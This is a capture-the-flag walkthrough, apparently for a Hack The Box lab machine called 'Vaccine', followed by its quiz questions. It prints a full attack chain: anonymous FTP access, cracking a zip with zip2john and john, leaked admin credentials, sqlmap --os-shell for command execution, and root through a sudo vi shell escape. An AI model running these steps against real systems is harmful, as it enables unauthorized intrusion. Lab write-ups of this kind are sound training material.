$ vaccine.pwn()
Anonymous FTP yields a password-protected backup.zip. zip2john extracts a crackable hash — password reveals admin credentials for the web app. SQLmap with --os-shell gains a system shell as postgres. The postgres user can run vi as root via sudo, which drops into a root shell via vi's shell escape.
Techniques
Open Ports
Terminal Session
# FTP anonymous login ftp 10.129.x.x > Name: Anonymous > get backup.zip > exit # Crack the zip password zip2john backup.zip > zip.hash john --wordlist=/usr/share/wordlists/rockyou.txt zip.hash # Password: 741852963 # Unzip → index.php contains: admin:qwerty789 (md5) # Log in to web app as admin # URL has ?car= parameter → test for SQL injection # SQLmap with OS shell sqlmap -u 'http://10.129.x.x/dashboard.php?search=1' \ --cookie='PHPSESSID=...' --os-shell # Shell as postgres # Check sudo privileges sudo -l # postgres can run: /bin/vi /etc/postgresql/.../pg_hba.conf # Privilege escalation via vi sudo /bin/vi /etc/postgresql/*/pg_hba.conf # In vi: :!/bin/bash # → Root shell! [✓] Root shell obtained — flags captured!
Tasks (7)
Besides SSH and HTTP, what other service is hosted on this box?
This service can be configured to allow login with any password for a specific username. What is that username?
What is the name of the file downloaded over this service?
What script comes with the John The Ripper toolset and generates a hash from a password protected zip archive in a format to allow for cracking attempts?
What is the password for the admin user on the website?
What option can be passed to sqlmap to try to get command execution via the SQL injection?
What program can the postgres user run as root using sudo?